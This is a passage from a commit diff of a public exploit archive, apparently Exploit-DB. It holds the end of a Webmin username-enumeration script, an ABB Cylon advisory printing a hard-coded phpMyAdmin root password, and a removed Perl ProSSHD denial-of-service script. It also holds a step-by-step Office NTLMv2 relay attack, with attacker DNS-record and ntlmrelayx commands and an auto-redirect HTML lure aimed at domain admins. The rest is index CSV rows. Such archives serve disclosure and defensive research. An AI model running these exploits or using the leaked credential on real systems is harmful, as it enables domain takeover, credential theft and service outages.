if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.

82
exploits/php/webapps/52112.NA Normal file
View file

@ -0,0 +1,82 @@
ABB Cylon Aspect 3.07.01 (config.inc.php) Hard-coded Credentials in phpMyAdmin
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller is operating with default and hard-coded
credentials contained in install package while exposed to the Internet.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
phpMyAdmin 2.11.9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Reported by DIVD
Advisory ID: ZSL-2024-5830
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5830.php
CVE ID: CVE-2024-4007
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-4007
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat max/var/www/html/phpMyAdmin/config.inc.php | grep control
$cfg['Servers'][$i]['controluser'] = 'root';
$cfg['Servers'][$i]['controlpass'] = 'F@c1liTy';

68
exploits/windows/remote/52110.txt
View file

@ -1,68 +0,0 @@
# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
# Google Dork: N/A
# Date: 13 january 2024
# Exploit Author: Fernando Mengali
# Vendor Homepage: https://prosshd.com/
# Software Link: N/A
# Version: 1.2 20090726
# Tested on: Windows XP
# CVE: CVE-2024-0725
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {s
$cmd="clear";
}
system("$cmd");
intro();
main();
print "\t ==> Connecting to webserver... \n\n";
sleep(1);
my $i=0;
print "\t ==> Exploiting... \n\n";
my $payload = "\x41" x 500;
$connection2 = Net::SSH2->new();
$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$scpget = $connection2->scp_get($payload);
$connection2->disconnect();
print "\t ==> Done! Exploited!";
sub intro {
print q {
,--,
_ ___/ /\|
,;'( )__, ) ~
// // '--;
' \ | ^
^ ^
[+] ProSSHD 1.2 20090726 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: fernando.mengalli@gmail.com
}
}
sub main {
our ($ip, $port, $username, $password) = @ARGV;
unless (defined($ip) && defined($port)) {
print "\n\tUsage: $0 <ip> <port> <username> <password> \n";
exit(-1);
}
}

56
exploits/windows/remote/52113.NA Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.office.com/
# Software Link: https://www.office.com/
# Details: https://github.com/passtheticket/CVE-2024-38200
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)
# Tested against: Windows 11
# CVE: CVE-2024-38200
# Description
MS Office URI schemes allow for fetching a document from remote source.
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .
Example: ms-word:ofe|u|http://hostname:port/leak.docx
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.
# Proof Of Concept
If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.
1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local
2. Fire up ntlmrelayx with following command
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080
3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft Office</title>
</head>
<body>
<a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>
<script>
function navigateToLink() {
var link = document.getElementById('link');
if (link) {
var url = link.getAttribute('href');
window.location.href = url;
}
}
window.onload = navigateToLink;
</script>
</body>
</html>
4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)
5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.

11
files_exploits.csv
View file

@ -5480,6 +5480,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)",2021-08-04,"Adrián Díaz",webapps,java,,2021-08-04,2021-10-29,0,CVE-2020-9496,,,,,
32821,exploits/java/webapps/32821.html,"APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting",2009-02-26,"Digital Security Research Group",webapps,java,,2009-02-26,2014-04-11,1,OSVDB-52503,,,,,https://www.securityfocus.com/bid/33924/info
40817,exploits/java/webapps/40817.txt,"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting",2016-11-22,"Julien Ahrens",webapps,java,,2016-11-22,2016-11-22,0,,,,,,
52118,exploits/java/webapps/52118.py,"AppSmith 1.47 - Remote Code Execution (RCE)",2025-04-03,"Nishanth Gaddam",webapps,java,,2025-04-03,2025-04-03,0,CVE-2024-55963,,,,,
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",2021-10-05,"Mayank Deshmukh",webapps,java,,2021-10-05,2021-10-05,0,CVE-2021-26085,,,,,
40794,exploits/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",webapps,java,,2016-11-21,2016-11-21,0,,,,,,
42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,webapps,java,,2017-08-23,2017-08-23,0,CVE-2017-9640,,,,,
@ -10477,6 +10478,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19704,exploits/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,local,multiple,,1999-12-30,2012-07-09,1,CVE-2000-0009;OSVDB-1185,,,,,https://www.securityfocus.com/bid/907/info
35732,exploits/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,local,multiple,,2015-01-08,2015-01-08,0,OSVDB-116836,,,,,https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/
32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities",2008-10-21,"Flavio D. Garcia",local,multiple,,2008-10-21,2019-03-28,1,,,,,,https://www.securityfocus.com/bid/31853/info
52116,exploits/multiple/local/52116.py,"ollama 0.6.4 - Server Side Request Forgery (SSRF)",2025-04-03,sud0,local,multiple,,2025-04-03,2025-04-03,0,,,,,,
19967,exploits/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,local,multiple,,2000-05-25,2012-07-20,1,CVE-2000-0449;OSVDB-11896,,,,,https://www.securityfocus.com/bid/1255/info
21856,exploits/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",local,multiple,,2002-09-25,2012-10-09,1,CVE-2002-1513;OSVDB-11089,,,,,https://www.securityfocus.com/bid/5790/info
10267,exploits/multiple/local/10267.txt,"Oracle - ctxsys.drvxtabc.create_tables",2009-12-01,"Andrea Purificato",local,multiple,,2009-11-30,,1,,,,,,
@ -11571,6 +11573,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19127,exploits/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",remote,multiple,,1998-07-14,2012-06-13,1,OSVDB-83170;OSVDB-83129,,,,,https://www.securityfocus.com/bid/162/info
22472,exploits/multiple/remote/22472.txt,"Vignette StoryServer 4.1 - Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,remote,multiple,,2003-04-07,2012-11-04,1,CVE-2003-0400;OSVDB-4911,,,,,https://www.securityfocus.com/bid/7296/info
24983,exploits/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1299;OSVDB-12470,,,,,https://www.securityfocus.com/bid/11979/info
52111,exploits/multiple/remote/52111.py,"Vite 6.2.2 - Arbitrary File Read",2025-04-03,4m3rr0r,remote,multiple,,2025-04-03,2025-04-03,0,CVE-2025-30208,,,,,
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,,
@ -11643,6 +11646,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,,2018-02-20,2018-02-21,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
34111,exploits/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",webapps,multiple,,2010-06-09,2014-07-19,1,,,,,,https://www.securityfocus.com/bid/40676/info
33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info
52115,exploits/multiple/webapps/52115.NA,"ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)",2025-04-03,LiquidWorm,webapps,multiple,,2025-04-03,2025-04-03,0,CVE-na,,,,,
52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-02,0,CVE-2024-6298,,,,,
43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,,
@ -12098,6 +12102,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
@ -12848,6 +12853,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,,2018-02-28,2018-02-28,1,CVE-2018-6193,,,,,
51509,exploits/perl/webapps/51509.py,"Thruk Monitoring Web Interface 3.06 - Path Traversal",2023-06-09,"Galoget Latorre",webapps,perl,,2023-06-09,2023-06-09,0,CVE-2023-34096,,,,,
44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,,2018-04-02,2018-04-02,0,,,,,,
52114,exploits/perl/webapps/52114.py,"Webmin Usermin 2.100 - Username Enumeration",2025-04-03,Kjesper,webapps,perl,,2025-04-03,2025-04-03,0,CVE-2024-44762,,,,,
1651,exploits/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,dos,php,,2006-04-08,2016-07-07,1,,,,,http://www.exploit-db.comadodb468.tgz,
30753,exploits/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,dos,php,,2007-11-12,2014-01-06,1,CVE-2007-5984;OSVDB-45282,,,,,https://www.securityfocus.com/bid/26410/info
40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",dos,php,,2017-01-08,2017-01-09,0,,,,,,
@ -13414,6 +13420,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-23,1,CVE-2022-26521,,,,,
27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
52112,exploits/php/webapps/52112.NA,"ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials",2025-04-03,LiquidWorm,webapps,php,,2025-04-03,2025-04-03,0,CVE-2024-4007,,,,,
52108,exploits/php/webapps/52108.NA,"ABB Cylon Aspect 3.08.01 - Arbitrary File Delete",2025-04-02,LiquidWorm,webapps,php,,2025-04-02,2025-04-02,0,CVE-2024-6209,,,,,
8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comabc_v_0_6_4.zip,
@ -25393,7 +25400,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38039,exploits/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",webapps,php,,2012-11-20,2016-10-24,1,,,,,,https://www.securityfocus.com/bid/56598/info
50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",2021-09-03,"Eric Salario",webapps,php,,2021-09-03,2021-10-22,0,CVE-2021-40651,,,,,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",2021-09-29,"Eric Salario",webapps,php,,2021-09-29,2021-09-29,0,,,,,,
52080,exploits/php/webapps/52080.txt,"openSIS 9.1 - SQLi (Authenticated)",2024-10-01,"Devrim Dıragumandan",webapps,php,,2024-10-01,2024-10-01,0,,,,,,
52080,exploits/php/webapps/52080.txt,"openSIS 9.1 - SQLi (Authenticated)",2024-10-01,"Devrim Dıragumandan",webapps,php,,2024-10-01,2025-04-03,0,CVE-2024-46626,,,,,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",2021-09-02,"Eric Salario",webapps,php,,2021-09-02,2021-09-03,0,,,,,,
50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",2022-01-05,securityforeveryone.com,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
15924,exploits/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,webapps,php,,2011-01-07,2011-01-07,0,,,,,http://www.exploit-db.comopensite-v0.2.2-beta.zip,
@ -44302,6 +44309,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38968,exploits/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)",2015-12-14,"Google Security Research",remote,windows,,2015-12-14,2015-12-14,1,CVE-2015-6132;OSVDB-131342;MS15-132,,,,,https://code.google.com/p/google-security-research/issues/detail?id=556
28198,exploits/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,remote,windows,,2006-07-11,2013-09-10,1,CVE-2006-2389;OSVDB-27149,,,,,https://www.securityfocus.com/bid/18911/info
24526,exploits/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,remote,windows,,2013-02-20,2013-02-23,1,OSVDB-69085;CVE-2010-3333,,,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-02-20-at-92423-am.png,,
52113,exploits/windows/remote/52113.NA,"Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure",2025-04-03,"Metin Yunus Kandemir",remote,windows,,2025-04-03,2025-04-03,0,CVE-2024-38200,,,,,
20122,exploits/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,remote,windows,8082,2012-07-31,2012-07-31,1,CVE-2010-3964;OSVDB-69817;MS10-104,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-10-287/
16537,exploits/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)",2010-07-20,Metasploit,remote,windows,,2010-07-20,2016-10-27,1,CVE-2009-1136;OSVDB-55806;MS09-043,"Metasploit Framework (MSF)",,,,http://www.microsoft.com/technet/security/advisory/973472.mspx
9224,exploits/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow",2009-07-21,"Ahmed Obied",remote,windows,,2009-07-20,2017-11-22,1,,,,,,
@ -45070,7 +45078,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows,,2010-11-01,2014-10-12,1,,,,,,https://www.securityfocus.com/bid/44569/info
36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows,,2011-10-14,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/50133/info
12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows,,2010-05-02,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
52110,exploits/windows/remote/52110.txt,"ProSSHD 1.2 - Denial of Service (DOS)",2025-04-02,"Fernando Mengali",remote,windows,,2025-04-02,2025-04-02,0,CVE-2024-0725,,,,,
11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows,,2010-03-01,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2016-10-27,1,CVE-2006-4948;OSVDB-29032,"Metasploit Framework (MSF)",,,http://www.exploit-db.comtftpdwin.exe,
3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69,2007-01-14,2016-10-27,1,OSVDB-29032;CVE-2006-4948,,,,http://www.exploit-db.comtftpdwin.exe,

Can't render this file because it is too large.